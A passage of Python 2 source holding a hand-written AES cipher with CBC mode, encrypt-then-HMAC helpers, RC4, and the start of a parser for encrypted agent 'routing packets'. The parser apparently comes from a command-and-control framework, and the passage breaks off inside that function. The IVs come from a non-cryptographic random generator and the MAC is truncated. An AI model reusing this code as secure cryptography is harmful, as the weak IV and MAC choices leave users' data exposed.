0x4ebc3774, 0x82caa6fc, 0x90d0b0e0, 0xa7d81533, 0x04984af1, 0xecdaf741, 0xcd500e7f, 0x91f62f17, 0x4dd68d76, 0xefb04d43, 0xaa4d54cc, 0x9604dfe4, 0xd1b5e39e, 0x6a881b4c, 0x2c1fb8c1, 0x65517f46, 0x5eea049d, 0x8c355d01, 0x877473fa, 0x0b412efb, 0x671d5ab3, 0xdbd25292, 0x105633e9, 0xd647136d, 0xd7618c9a, 0xa10c7a37, 0xf8148e59, 0x133c89eb, 0xa927eece, 0x61c935b7, 0x1ce5ede1, 0x47b13c7a, 0xd2df599c, 0xf2733f55, 0x14ce7918, 0xc737bf73, 0xf7cdea53, 0xfdaa5b5f, 0x3d6f14df, 0x44db8678, 0xaff381ca, 0x68c43eb9, 0x24342c38, 0xa3405fc2, 0x1dc37216, 0xe2250cbc, 0x3c498b28, 0x0d9541ff, 0xa8017139, 0x0cb3de08, 0xb4e49cd8, 0x56c19064, 0xcb84617b, 0x32b670d5, 0x6c5c7448, 0xb85742d0]
# Transformations for decryption key expansion
U1 = [0x00000000, 0x0e090d0b, 0x1c121a16, 0x121b171d, 0x3824342c, 0x362d3927, 0x24362e3a, 0x2a3f2331, 0x70486858, 0x7e416553, 0x6c5a724e, 0x62537f45, 0x486c5c74, 0x4665517f, 0x547e4662, 0x5a774b69, 0xe090d0b0, 0xee99ddbb, 0xfc82caa6, 0xf28bc7ad, 0xd8b4e49c, 0xd6bde997, 0xc4a6fe8a, 0xcaaff381, 0x90d8b8e8, 0x9ed1b5e3, 0x8ccaa2fe, 0x82c3aff5, 0xa8fc8cc4, 0xa6f581cf, 0xb4ee96d2, 0xbae79bd9, 0xdb3bbb7b, 0xd532b670, 0xc729a16d, 0xc920ac66, 0xe31f8f57, 0xed16825c, 0xff0d9541, 0xf104984a, 0xab73d323, 0xa57ade28, 0xb761c935, 0xb968c43e, 0x9357e70f, 0x9d5eea04, 0x8f45fd19, 0x814cf012, 0x3bab6bcb, 0x35a266c0, 0x27b971dd, 0x29b07cd6, 0x038f5fe7, 0x0d8652ec, 0x1f9d45f1, 0x119448fa, 0x4be30393, 0x45ea0e98, 0x57f11985, 0x59f8148e, 0x73c737bf, 0x7dce3ab4, 0x6fd52da9, 0x61dc20a2, 0xad766df6, 0xa37f60fd, 0xb16477e0, 0xbf6d7aeb, 0x955259da, 0x9b5b54d1, 0x894043cc, 0x87494ec7, 0xdd3e05ae, 0xd33708a5, 0xc12c1fb8, 0xcf2512b3, 0xe51a3182, 0xeb133c89, 0xf9082b94, 0xf701269f, 0x4de6bd46, 0x43efb04d, 0x51f4a750, 0x5ffdaa5b, 0x75c2896a, 0x7bcb8461, 0x69d0937c, 0x67d99e77, 0x3daed51e, 0x33a7d815, 0x21bccf08, 0x2fb5c203, 0x058ae132, 0x0b83ec39, 0x1998fb24, 0x1791f62f, 0x764dd68d, 0x7844db86, 0x6a5fcc9b, 0x6456c190, 0x4e69e2a1, 0x4060efaa, 0x527bf8b7, 0x5c72f5bc, 0x0605bed5, 0x080cb3de, 0x1a17a4c3, 0x141ea9c8, 0x3e218af9, 0x302887f2, 0x223390ef, 0x2c3a9de4, 0x96dd063d, 0x98d40b36, 0x8acf1c2b, 0x84c61120, 0xaef93211, 0xa0f03f1a, 0xb2eb2807, 0xbce2250c, 0xe6956e65, 0xe89c636e, 0xfa877473, 0xf48e7978, 0xdeb15a49, 0xd0b85742, 0xc2a3405f, 0xccaa4d54, 0x41ecdaf7, 0x4fe5d7fc, 0x5dfec0e1, 0x53f7cdea, 0x79c8eedb, 0x77c1e3d0, 0x65daf4cd, 0x6bd3f9c6, 0x31a4b2af, 0x3fadbfa4, 0x2db6a8b9, 0x23bfa5b2, 0x09808683, 0x07898b88, 0x15929c95, 0x1b9b919e, 0xa17c0a47, 0xaf75074c, 0xbd6e1051, 0xb3671d5a, 0x99583e6b, 0x97513360, 0x854a247d, 0x8b432976, 0xd134621f, 0xdf3d6f14, 0xcd267809, 0xc32f7502, 0xe9105633, 0xe7195b38, 0xf5024c25, 0xfb0b412e, 0x9ad7618c, 0x94de6c87, 0x86c57b9a, 0x88cc7691, 0xa2f355a0, 0xacfa58ab, 0xbee14fb6, 0xb0e842bd, 0xea9f09d4, 0xe49604df, 0xf68d13c2, 0xf8841ec9, 0xd2bb3df8, 0xdcb230f3, 0xcea927ee, 0xc0a02ae5, 0x7a47b13c, 0x744ebc37, 0x6655ab2a, 0x685ca621, 0x42638510, 0x4c6a881b, 0x5e719f06, 0x5078920d, 0x0a0fd964, 0x0406d46f, 0x161dc372, 0x1814ce79, 0x322bed48, 0x3c22e043, 0x2e39f75e, 0x2030fa55, 0xec9ab701, 0xe293ba0a, 0xf088ad17, 0xfe81a01c, 0xd4be832d, 0xdab78e26, 0xc8ac993b, 0xc6a59430, 0x9cd2df59, 0x92dbd252, 0x80c0c54f, 0x8ec9c844, 0xa4f6eb75, 0xaaffe67e, 0xb8e4f163, 0xb6edfc68, 0x0c0a67b1, 0x02036aba, 0x10187da7, 0x1e1170ac, 0x342e539d, 0x3a275e96, 0x283c498b, 0x26354480, 0x7c420fe9, 0x724b02e2, 0x605015ff, 0x6e5918f4, 0x44663bc5, 0x4a6f36ce, 0x587421d3, 0x567d2cd8, 0x37a10c7a, 0x39a80171, 0x2bb3166c, 0x25ba1b67, 0x0f853856, 0x018c355d, 0x13972240, 0x1d9e2f4b, 0x47e96422, 0x49e06929, 0x5bfb7e34, 0x55f2733f, 0x7fcd500e, 0x71c45d05, 0x63df4a18, 0x6dd64713, 0xd731dcca, 0xd938d1c1, 0xcb23c6dc, 0xc52acbd7, 0xef15e8e6, 0xe11ce5ed, 0xf307f2f0, 0xfd0efffb, 0xa779b492, 0xa970b999, 0xbb6bae84, 0xb562a38f, 0x9f5d80be, 0x91548db5, 0x834f9aa8, 0x8d4697a3]
U2 = [0x00000000, 0x0b0e090d, 0x161c121a, 0x1d121b17, 0x2c382434, 0x27362d39, 0x3a24362e, 0x312a3f23, 0x58704868, 0x537e4165, 0x4e6c5a72, 0x4562537f, 0x74486c5c, 0x7f466551, 0x62547e46, 0x695a774b, 0xb0e090d0, 0xbbee99dd, 0xa6fc82ca, 0xadf28bc7, 0x9cd8b4e4, 0x97d6bde9, 0x8ac4a6fe, 0x81caaff3, 0xe890d8b8, 0xe39ed1b5, 0xfe8ccaa2, 0xf582c3af, 0xc4a8fc8c, 0xcfa6f581, 0xd2b4ee96, 0xd9bae79b, 0x7bdb3bbb, 0x70d532b6, 0x6dc729a1, 0x66c920ac, 0x57e31f8f, 0x5ced1682, 0x41ff0d95, 0x4af10498, 0x23ab73d3, 0x28a57ade, 0x35b761c9, 0x3eb968c4, 0x0f9357e7, 0x049d5eea, 0x198f45fd, 0x12814cf0, 0xcb3bab6b, 0xc035a266, 0xdd27b971, 0xd629b07c, 0xe7038f5f, 0xec0d8652, 0xf11f9d45, 0xfa119448, 0x934be303, 0x9845ea0e, 0x8557f119, 0x8e59f814, 0xbf73c737, 0xb47dce3a, 0xa96fd52d, 0xa261dc20, 0xf6ad766d, 0xfda37f60, 0xe0b16477, 0xebbf6d7a, 0xda955259, 0xd19b5b54, 0xcc894043, 0xc787494e, 0xaedd3e05, 0xa5d33708, 0xb8c12c1f, 0xb3cf2512, 0x82e51a31, 0x89eb133c, 0x94f9082b, 0x9ff70126, 0x464de6bd, 0x4d43efb0, 0x5051f4a7, 0x5b5ffdaa, 0x6a75c289, 0x617bcb84, 0x7c69d093, 0x7767d99e, 0x1e3daed5, 0x1533a7d8, 0x0821bccf, 0x032fb5c2, 0x32058ae1, 0x390b83ec, 0x241998fb, 0x2f1791f6, 0x8d764dd6, 0x867844db, 0x9b6a5fcc, 0x906456c1, 0xa14e69e2, 0xaa4060ef, 0xb7527bf8, 0xbc5c72f5, 0xd50605be, 0xde080cb3, 0xc31a17a4, 0xc8141ea9, 0xf93e218a, 0xf2302887, 0xef223390, 0xe42c3a9d, 0x3d96dd06, 0x3698d40b, 0x2b8acf1c, 0x2084c611, 0x11aef932, 0x1aa0f03f, 0x07b2eb28, 0x0cbce225, 0x65e6956e, 0x6ee89c63, 0x73fa8774, 0x78f48e79, 0x49deb15a, 0x42d0b857, 0x5fc2a340, 0x54ccaa4d, 0xf741ecda, 0xfc4fe5d7, 0xe15dfec0, 0xea53f7cd, 0xdb79c8ee, 0xd077c1e3, 0xcd65daf4, 0xc66bd3f9, 0xaf31a4b2, 0xa43fadbf, 0xb92db6a8, 0xb223bfa5, 0x83098086, 0x8807898b, 0x9515929c, 0x9e1b9b91, 0x47a17c0a, 0x4caf7507, 0x51bd6e10, 0x5ab3671d, 0x6b99583e, 0x60975133, 0x7d854a24, 0x768b4329, 0x1fd13462, 0x14df3d6f, 0x09cd2678, 0x02c32f75, 0x33e91056, 0x38e7195b, 0x25f5024c, 0x2efb0b41, 0x8c9ad761, 0x8794de6c, 0x9a86c57b, 0x9188cc76, 0xa0a2f355, 0xabacfa58, 0xb6bee14f, 0xbdb0e842, 0xd4ea9f09, 0xdfe49604, 0xc2f68d13, 0xc9f8841e, 0xf8d2bb3d, 0xf3dcb230, 0xeecea927, 0xe5c0a02a, 0x3c7a47b1, 0x37744ebc, 0x2a6655ab, 0x21685ca6, 0x10426385, 0x1b4c6a88, 0x065e719f, 0x0d507892, 0x640a0fd9, 0x6f0406d4, 0x72161dc3, 0x791814ce, 0x48322bed, 0x433c22e0, 0x5e2e39f7, 0x552030fa, 0x01ec9ab7, 0x0ae293ba, 0x17f088ad, 0x1cfe81a0, 0x2dd4be83, 0x26dab78e, 0x3bc8ac99, 0x30c6a594, 0x599cd2df, 0x5292dbd2, 0x4f80c0c5, 0x448ec9c8, 0x75a4f6eb, 0x7eaaffe6, 0x63b8e4f1, 0x68b6edfc, 0xb10c0a67, 0xba02036a, 0xa710187d, 0xac1e1170, 0x9d342e53, 0x963a275e, 0x8b283c49, 0x80263544, 0xe97c420f, 0xe2724b02, 0xff605015, 0xf46e5918, 0xc544663b, 0xce4a6f36, 0xd3587421, 0xd8567d2c, 0x7a37a10c, 0x7139a801, 0x6c2bb316, 0x6725ba1b, 0x560f8538, 0x5d018c35, 0x40139722, 0x4b1d9e2f, 0x2247e964, 0x2949e069, 0x345bfb7e, 0x3f55f273, 0x0e7fcd50, 0x0571c45d, 0x1863df4a, 0x136dd647, 0xcad731dc, 0xc1d938d1, 0xdccb23c6, 0xd7c52acb, 0xe6ef15e8, 0xede11ce5, 0xf0f307f2, 0xfbfd0eff, 0x92a779b4, 0x99a970b9, 0x84bb6bae, 0x8fb562a3, 0xbe9f5d80, 0xb591548d, 0xa8834f9a, 0xa38d4697]
U3 = [0x00000000, 0x0d0b0e09, 0x1a161c12, 0x171d121b, 0x342c3824, 0x3927362d, 0x2e3a2436, 0x23312a3f, 0x68587048, 0x65537e41, 0x724e6c5a, 0x7f456253, 0x5c74486c, 0x517f4665, 0x4662547e, 0x4b695a77, 0xd0b0e090, 0xddbbee99, 0xcaa6fc82, 0xc7adf28b, 0xe49cd8b4, 0xe997d6bd, 0xfe8ac4a6, 0xf381caaf, 0xb8e890d8, 0xb5e39ed1, 0xa2fe8cca, 0xaff582c3, 0x8cc4a8fc, 0x81cfa6f5, 0x96d2b4ee, 0x9bd9bae7, 0xbb7bdb3b, 0xb670d532, 0xa16dc729, 0xac66c920, 0x8f57e31f, 0x825ced16, 0x9541ff0d, 0x984af104, 0xd323ab73, 0xde28a57a, 0xc935b761, 0xc43eb968, 0xe70f9357, 0xea049d5e, 0xfd198f45, 0xf012814c, 0x6bcb3bab, 0x66c035a2, 0x71dd27b9, 0x7cd629b0, 0x5fe7038f, 0x52ec0d86, 0x45f11f9d, 0x48fa1194, 0x03934be3, 0x0e9845ea, 0x198557f1, 0x148e59f8, 0x37bf73c7, 0x3ab47dce, 0x2da96fd5, 0x20a261dc, 0x6df6ad76, 0x60fda37f, 0x77e0b164, 0x7aebbf6d, 0x59da9552, 0x54d19b5b, 0x43cc8940, 0x4ec78749, 0x05aedd3e, 0x08a5d337, 0x1fb8c12c, 0x12b3cf25, 0x3182e51a, 0x3c89eb13, 0x2b94f908, 0x269ff701, 0xbd464de6, 0xb04d43ef, 0xa75051f4, 0xaa5b5ffd, 0x896a75c2, 0x84617bcb, 0x937c69d0, 0x9e7767d9, 0xd51e3dae, 0xd81533a7, 0xcf0821bc, 0xc2032fb5, 0xe132058a, 0xec390b83, 0xfb241998, 0xf62f1791, 0xd68d764d, 0xdb867844, 0xcc9b6a5f, 0xc1906456, 0xe2a14e69, 0xefaa4060, 0xf8b7527b, 0xf5bc5c72, 0xbed50605, 0xb3de080c, 0xa4c31a17, 0xa9c8141e, 0x8af93e21, 0x87f23028, 0x90ef2233, 0x9de42c3a, 0x063d96dd, 0x0b3698d4, 0x1c2b8acf, 0x112084c6, 0x3211aef9, 0x3f1aa0f0, 0x2807b2eb, 0x250cbce2, 0x6e65e695, 0x636ee89c, 0x7473fa87, 0x7978f48e, 0x5a49deb1, 0x5742d0b8, 0x405fc2a3, 0x4d54ccaa, 0xdaf741ec, 0xd7fc4fe5, 0xc0e15dfe, 0xcdea53f7, 0xeedb79c8, 0xe3d077c1, 0xf4cd65da, 0xf9c66bd3, 0xb2af31a4, 0xbfa43fad, 0xa8b92db6, 0xa5b223bf, 0x86830980, 0x8b880789, 0x9c951592, 0x919e1b9b, 0x0a47a17c, 0x074caf75, 0x1051bd6e, 0x1d5ab367, 0x3e6b9958, 0x33609751, 0x247d854a, 0x29768b43, 0x621fd134, 0x6f14df3d, 0x7809cd26, 0x7502c32f, 0x5633e910, 0x5b38e719, 0x4c25f502, 0x412efb0b, 0x618c9ad7, 0x6c8794de, 0x7b9a86c5, 0x769188cc, 0x55a0a2f3, 0x58abacfa, 0x4fb6bee1, 0x42bdb0e8, 0x09d4ea9f, 0x04dfe496, 0x13c2f68d, 0x1ec9f884, 0x3df8d2bb, 0x30f3dcb2, 0x27eecea9, 0x2ae5c0a0, 0xb13c7a47, 0xbc37744e, 0xab2a6655, 0xa621685c, 0x85104263, 0x881b4c6a, 0x9f065e71, 0x920d5078, 0xd9640a0f, 0xd46f0406, 0xc372161d, 0xce791814, 0xed48322b, 0xe0433c22, 0xf75e2e39, 0xfa552030, 0xb701ec9a, 0xba0ae293, 0xad17f088, 0xa01cfe81, 0x832dd4be, 0x8e26dab7, 0x993bc8ac, 0x9430c6a5, 0xdf599cd2, 0xd25292db, 0xc54f80c0, 0xc8448ec9, 0xeb75a4f6, 0xe67eaaff, 0xf163b8e4, 0xfc68b6ed, 0x67b10c0a, 0x6aba0203, 0x7da71018, 0x70ac1e11, 0x539d342e, 0x5e963a27, 0x498b283c, 0x44802635, 0x0fe97c42, 0x02e2724b, 0x15ff6050, 0x18f46e59, 0x3bc54466, 0x36ce4a6f, 0x21d35874, 0x2cd8567d, 0x0c7a37a1, 0x017139a8, 0x166c2bb3, 0x1b6725ba, 0x38560f85, 0x355d018c, 0x22401397, 0x2f4b1d9e, 0x642247e9, 0x692949e0, 0x7e345bfb, 0x733f55f2, 0x500e7fcd, 0x5d0571c4, 0x4a1863df, 0x47136dd6, 0xdccad731, 0xd1c1d938, 0xc6dccb23, 0xcbd7c52a, 0xe8e6ef15, 0xe5ede11c, 0xf2f0f307, 0xfffbfd0e, 0xb492a779, 0xb999a970, 0xae84bb6b, 0xa38fb562, 0x80be9f5d, 0x8db59154, 0x9aa8834f, 0x97a38d46]
U4 = [0x00000000, 0x090d0b0e, 0x121a161c, 0x1b171d12, 0x24342c38, 0x2d392736, 0x362e3a24, 0x3f23312a, 0x48685870, 0x4165537e, 0x5a724e6c, 0x537f4562, 0x6c5c7448, 0x65517f46, 0x7e466254, 0x774b695a, 0x90d0b0e0, 0x99ddbbee, 0x82caa6fc, 0x8bc7adf2, 0xb4e49cd8, 0xbde997d6, 0xa6fe8ac4, 0xaff381ca, 0xd8b8e890, 0xd1b5e39e, 0xcaa2fe8c, 0xc3aff582, 0xfc8cc4a8, 0xf581cfa6, 0xee96d2b4, 0xe79bd9ba, 0x3bbb7bdb, 0x32b670d5, 0x29a16dc7, 0x20ac66c9, 0x1f8f57e3, 0x16825ced, 0x0d9541ff, 0x04984af1, 0x73d323ab, 0x7ade28a5, 0x61c935b7, 0x68c43eb9, 0x57e70f93, 0x5eea049d, 0x45fd198f, 0x4cf01281, 0xab6bcb3b, 0xa266c035, 0xb971dd27, 0xb07cd629, 0x8f5fe703, 0x8652ec0d, 0x9d45f11f, 0x9448fa11, 0xe303934b, 0xea0e9845, 0xf1198557, 0xf8148e59, 0xc737bf73, 0xce3ab47d, 0xd52da96f, 0xdc20a261, 0x766df6ad, 0x7f60fda3, 0x6477e0b1, 0x6d7aebbf, 0x5259da95, 0x5b54d19b, 0x4043cc89, 0x494ec787, 0x3e05aedd, 0x3708a5d3, 0x2c1fb8c1, 0x2512b3cf, 0x1a3182e5, 0x133c89eb, 0x082b94f9, 0x01269ff7, 0xe6bd464d, 0xefb04d43, 0xf4a75051, 0xfdaa5b5f, 0xc2896a75, 0xcb84617b, 0xd0937c69, 0xd99e7767, 0xaed51e3d, 0xa7d81533, 0xbccf0821, 0xb5c2032f, 0x8ae13205, 0x83ec390b, 0x98fb2419, 0x91f62f17, 0x4dd68d76, 0x44db8678, 0x5fcc9b6a, 0x56c19064, 0x69e2a14e, 0x60efaa40, 0x7bf8b752, 0x72f5bc5c, 0x05bed506, 0x0cb3de08, 0x17a4c31a, 0x1ea9c814, 0x218af93e, 0x2887f230, 0x3390ef22, 0x3a9de42c, 0xdd063d96, 0xd40b3698, 0xcf1c2b8a, 0xc6112084, 0xf93211ae, 0xf03f1aa0, 0xeb2807b2, 0xe2250cbc, 0x956e65e6, 0x9c636ee8, 0x877473fa, 0x8e7978f4, 0xb15a49de, 0xb85742d0, 0xa3405fc2, 0xaa4d54cc, 0xecdaf741, 0xe5d7fc4f, 0xfec0e15d, 0xf7cdea53, 0xc8eedb79, 0xc1e3d077, 0xdaf4cd65, 0xd3f9c66b, 0xa4b2af31, 0xadbfa43f, 0xb6a8b92d, 0xbfa5b223, 0x80868309, 0x898b8807, 0x929c9515, 0x9b919e1b, 0x7c0a47a1, 0x75074caf, 0x6e1051bd, 0x671d5ab3, 0x583e6b99, 0x51336097, 0x4a247d85, 0x4329768b, 0x34621fd1, 0x3d6f14df, 0x267809cd, 0x2f7502c3, 0x105633e9, 0x195b38e7, 0x024c25f5, 0x0b412efb, 0xd7618c9a, 0xde6c8794, 0xc57b9a86, 0xcc769188, 0xf355a0a2, 0xfa58abac, 0xe14fb6be, 0xe842bdb0, 0x9f09d4ea, 0x9604dfe4, 0x8d13c2f6, 0x841ec9f8, 0xbb3df8d2, 0xb230f3dc, 0xa927eece, 0xa02ae5c0, 0x47b13c7a, 0x4ebc3774, 0x55ab2a66, 0x5ca62168, 0x63851042, 0x6a881b4c, 0x719f065e, 0x78920d50, 0x0fd9640a, 0x06d46f04, 0x1dc37216, 0x14ce7918, 0x2bed4832, 0x22e0433c, 0x39f75e2e, 0x30fa5520, 0x9ab701ec, 0x93ba0ae2, 0x88ad17f0, 0x81a01cfe, 0xbe832dd4, 0xb78e26da, 0xac993bc8, 0xa59430c6, 0xd2df599c, 0xdbd25292, 0xc0c54f80, 0xc9c8448e, 0xf6eb75a4, 0xffe67eaa, 0xe4f163b8, 0xedfc68b6, 0x0a67b10c, 0x036aba02, 0x187da710, 0x1170ac1e, 0x2e539d34, 0x275e963a, 0x3c498b28, 0x35448026, 0x420fe97c, 0x4b02e272, 0x5015ff60, 0x5918f46e, 0x663bc544, 0x6f36ce4a, 0x7421d358, 0x7d2cd856, 0xa10c7a37, 0xa8017139, 0xb3166c2b, 0xba1b6725, 0x8538560f, 0x8c355d01, 0x97224013, 0x9e2f4b1d, 0xe9642247, 0xe0692949, 0xfb7e345b, 0xf2733f55, 0xcd500e7f, 0xc45d0571, 0xdf4a1863, 0xd647136d, 0x31dccad7, 0x38d1c1d9, 0x23c6dccb, 0x2acbd7c5, 0x15e8e6ef, 0x1ce5ede1, 0x07f2f0f3, 0x0efffbfd, 0x79b492a7, 0x70b999a9, 0x6bae84bb, 0x62a38fb5, 0x5d80be9f, 0x548db591, 0x4f9aa883, 0x4697a38d]
def __init__(self, key):
if len(key) not in (16, 24, 32):
raise ValueError('Invalid key size')
rounds = self.number_of_rounds[len(key)]
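# Per FIPS-197, 16-, 24- and 32-byte keys use 10, 12 and 14 rounds respectively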
# Encryption round keys
self._Ke = [[0] * 4 for i in xrange(rounds + 1)]
# Decryption round keys
self._Kd = [[0] * 4 for i in xrange(rounds + 1)]
round_key_count = (rounds + 1) * 4
KC = len(key) // 4
# Convert the key into ints
tk = [struct.unpack('>i', key[i:i + 4])[0] for i in xrange(0, len(key), 4)]
# Copy values into round key arrays
for i in xrange(0, KC):
self._Ke[i // 4][i % 4] = tk[i]
self._Kd[rounds - (i // 4)][i % 4] = tk[i]
# Key expansion (fips-197 section 5.2)
rconpointer = 0
t = KC
while t < round_key_count:
tt = tk[KC - 1]
tk[0] ^= ((self.S[(tt >> 16) & 0xFF] << 24) ^
(self.S[(tt >> 8) & 0xFF] << 16) ^
(self.S[ tt & 0xFF] << 8) ^
self.S[(tt >> 24) & 0xFF] ^
(self.rcon[rconpointer] << 24))
rconpointer += 1
if KC != 8:
for i in xrange(1, KC):
tk[i] ^= tk[i - 1]
# Key expansion for 256-bit keys is "slightly different" (fips-197)
else:
for i in xrange(1, KC // 2):
tk[i] ^= tk[i - 1]
tt = tk[KC // 2 - 1]
tk[KC // 2] ^= (self.S[ tt & 0xFF] ^
(self.S[(tt >> 8) & 0xFF] << 8) ^
(self.S[(tt >> 16) & 0xFF] << 16) ^
(self.S[(tt >> 24) & 0xFF] << 24))
for i in xrange(KC // 2 + 1, KC):
tk[i] ^= tk[i - 1]
# Copy values into round key arrays
j = 0
while j < KC and t < round_key_count:
self._Ke[t // 4][t % 4] = tk[j]
self._Kd[rounds - (t // 4)][t % 4] = tk[j]
j += 1
t += 1
# Inverse-Cipher-ify the decryption round key (fips-197 section 5.3)
for r in xrange(1, rounds):
for j in xrange(0, 4):
tt = self._Kd[r][j]
self._Kd[r][j] = (self.U1[(tt >> 24) & 0xFF] ^
self.U2[(tt >> 16) & 0xFF] ^
self.U3[(tt >> 8) & 0xFF] ^
self.U4[ tt & 0xFF])
def encrypt(self, plaintext):
'Encrypt a block of plain text using the AES block cipher.'
if len(plaintext) != 16:
raise ValueError('wrong block length')
rounds = len(self._Ke) - 1
(s1, s2, s3) = [1, 2, 3]
a = [0, 0, 0, 0]
# Convert plaintext to (ints ^ key)
t = [(_compact_word(plaintext[4 * i:4 * i + 4]) ^ self._Ke[0][i]) for i in xrange(0, 4)]
# Apply round transforms: each T1-T4 lookup fuses SubBytes, ShiftRows and MixColumns into one 32-bit word (the classic T-table optimisation)
for r in xrange(1, rounds):
for i in xrange(0, 4):
a[i] = (self.T1[(t[ i ] >> 24) & 0xFF] ^
self.T2[(t[(i + s1) % 4] >> 16) & 0xFF] ^
self.T3[(t[(i + s2) % 4] >> 8) & 0xFF] ^
self.T4[ t[(i + s3) % 4] & 0xFF] ^
self._Ke[r][i])
t = copy.copy(a)
# The last round is special
result = []
for i in xrange(0, 4):
tt = self._Ke[rounds][i]
result.append((self.S[(t[ i ] >> 24) & 0xFF] ^ (tt >> 24)) & 0xFF)
result.append((self.S[(t[(i + s1) % 4] >> 16) & 0xFF] ^ (tt >> 16)) & 0xFF)
result.append((self.S[(t[(i + s2) % 4] >> 8) & 0xFF] ^ (tt >> 8)) & 0xFF)
result.append((self.S[ t[(i + s3) % 4] & 0xFF] ^ tt ) & 0xFF)
return result
def decrypt(self, ciphertext):
'Decrypt a block of cipher text using the AES block cipher.'
if len(ciphertext) != 16:
raise ValueError('wrong block length')
rounds = len(self._Kd) - 1
(s1, s2, s3) = [3, 2, 1]
a = [0, 0, 0, 0]
# Convert ciphertext to (ints ^ key)
t = [(_compact_word(ciphertext[4 * i:4 * i + 4]) ^ self._Kd[0][i]) for i in xrange(0, 4)]
# Apply inverse round transforms via the T5-T8 decryption tables
for r in xrange(1, rounds):
for i in xrange(0, 4):
a[i] = (self.T5[(t[ i ] >> 24) & 0xFF] ^
self.T6[(t[(i + s1) % 4] >> 16) & 0xFF] ^
self.T7[(t[(i + s2) % 4] >> 8) & 0xFF] ^
self.T8[ t[(i + s3) % 4] & 0xFF] ^
self._Kd[r][i])
t = copy.copy(a)
# The last round is special
result = []
for i in xrange(0, 4):
tt = self._Kd[rounds][i]
result.append((self.Si[(t[ i ] >> 24) & 0xFF] ^ (tt >> 24)) & 0xFF)
result.append((self.Si[(t[(i + s1) % 4] >> 16) & 0xFF] ^ (tt >> 16)) & 0xFF)
result.append((self.Si[(t[(i + s2) % 4] >> 8) & 0xFF] ^ (tt >> 8)) & 0xFF)
result.append((self.Si[ t[(i + s3) % 4] & 0xFF] ^ tt ) & 0xFF)
return result
class AESBlockModeOfOperation(object):
'''Super-class for AES modes of operation that require blocks.'''
def __init__(self, key):
self._aes = AES(key)
def decrypt(self, ciphertext):
raise NotImplementedError('decrypt must be implemented by a subclass')
def encrypt(self, plaintext):
raise NotImplementedError('encrypt must be implemented by a subclass')
class AESModeOfOperationCBC(AESBlockModeOfOperation):
name = "Cipher-Block Chaining (CBC)"
def __init__(self, key, iv=None):
if iv is None:
self._last_cipherblock = [0] * 16
elif len(iv) != 16:
raise ValueError('initialization vector must be 16 bytes')
else:
self._last_cipherblock = _string_to_bytes(iv)
AESBlockModeOfOperation.__init__(self, key)
def encrypt(self, plaintext):
if len(plaintext) != 16:
raise ValueError('plaintext block must be 16 bytes')
plaintext = _string_to_bytes(plaintext)
precipherblock = [(p ^ l) for (p, l) in zip(plaintext, self._last_cipherblock)]
self._last_cipherblock = self._aes.encrypt(precipherblock)
return _bytes_to_string(self._last_cipherblock)
def decrypt(self, ciphertext):
if len(ciphertext) != 16:
raise ValueError('ciphertext block must be 16 bytes')
cipherblock = _string_to_bytes(ciphertext)
plaintext = [(p ^ l) for (p, l) in zip(self._aes.decrypt(cipherblock), self._last_cipherblock)]
self._last_cipherblock = cipherblock
return _bytes_to_string(plaintext)
def CBCenc(aesObj, plaintext, base64=False):
# break the plaintext into 16-byte blocks, PKCS#7-padding the last block
blocks = [plaintext[0+i:16+i] for i in range(0, len(plaintext), 16)]
blocks[-1] = append_PKCS7_padding(blocks[-1])
ciphertext = ""
for block in blocks:
ciphertext += aesObj.encrypt(block)
return ciphertext
def CBCdec(aesObj, ciphertext, base64=False):
# break the ciphertext into 16-byte blocks; PKCS#7 padding is stripped from the final decrypted block
blocks = [ciphertext[0+i:16+i] for i in range(0, len(ciphertext), 16)]
plaintext = ""
for x in xrange(0, len(blocks)-1):
plaintext += aesObj.decrypt(blocks[x])
plaintext += strip_PKCS7_padding(aesObj.decrypt(blocks[-1]))
return plaintext
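# Illustrative round-trip sketch (not part of the original API surface; the key
# value here is an arbitrary example and must be 16/24/32 bytes). Because
# CBCenc applies PKCS#7 padding, plaintext of any length survives CBCdec:
#   key = '0123456789abcdef'
#   iv = getIV()
#   ct = CBCenc(AESModeOfOperationCBC(key, iv=iv), 'attack at dawn')
#   assert CBCdec(AESModeOfOperationCBC(key, iv=iv), ct) == 'attack at dawn'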
def getIV(length=16):
# renamed from `len` to avoid shadowing the builtin
return ''.join(chr(random.randint(0, 255)) for _ in range(length))
def aes_encrypt(key, data):
"""
Generate a random IV and new AES cipher object with the given
key, and return IV + encryptedData.
"""
IV = getIV()
aes = AESModeOfOperationCBC(key, iv=IV)
return IV + CBCenc(aes, data)
def aes_encrypt_then_hmac(key, data):
"""
Encrypt the data then calculate HMAC over the ciphertext.
"""
data = aes_encrypt(key, data)
mac = hmac.new(str(key), data, hashlib.sha256).digest()
return data + mac[0:10]
def aes_decrypt(key, data):
"""
Generate an AES cipher object, pull out the IV from the data
and return the unencrypted data.
"""
IV = data[0:16]
aes = AESModeOfOperationCBC(key, iv=IV)
return CBCdec(aes, data[16:])
def verify_hmac(key, data):
"""
Verify the HMAC supplied in the data with the given key.
"""
if len(data) > 20:
mac = data[-10:]
data = data[:-10]
expected = hmac.new(str(key), data, hashlib.sha256).digest()[0:10]
# Double HMAC to prevent timing attacks. hmac.compare_digest() is
# preferable, but only available since Python 2.7.7.
return hmac.new(str(key), expected).digest() == hmac.new(str(key), mac).digest()
else:
return False
def aes_decrypt_and_verify(key, data):
"""
Decrypt the data, but only if it has a valid MAC.
"""
if len(data) > 32 and verify_hmac(key, data):
return aes_decrypt(key, data[:-10])
raise Exception("Invalid ciphertext received.")
def rc4(key, data):
"""
Decrypt/encrypt the passed data using RC4 and the given key.
"""
S,j,out=range(256),0,[]
for i in range(256):
j=(j+S[i]+ord(key[i%len(key)]))%256
S[i],S[j]=S[j],S[i]
i=j=0
for char in data:
i=(i+1)%256
j=(j+S[i])%256
S[i],S[j]=S[j],S[i]
out.append(chr(ord(char)^S[(S[i]+S[j])%256]))
return ''.join(out)
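# RC4 is its own inverse: applying it twice with the same key restores the
# input. Quick sanity sketch (key and data are arbitrary example values):
#   assert rc4('k3y', rc4('k3y', 'hello')) == 'hello'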
def parse_routing_packet(stagingKey, data):
"""
Decodes the rc4 "routing packet" and parses raw agent data into:
{sessionID : (language, meta, additional, [encData]), ...}
Routing packet format:
+---------+-------------------+--------------------------+
| RC4 IV | RC4s(RoutingData) | AESc(client packet data) | ...
+---------+-------------------+--------------------------+
| 4 | 16 | RC4 length |
+---------+-------------------+--------------------------+
RC4s(RoutingData):
+-----------+------+------+-------+--------+
| SessionID | Lang | Meta | Extra | Length |
+-----------+------+------+-------+--------+
| 8 | 1 | 1 | 2 | 4 |
+-----------+------+------+-------+--------+
"""
if data:
results = {}
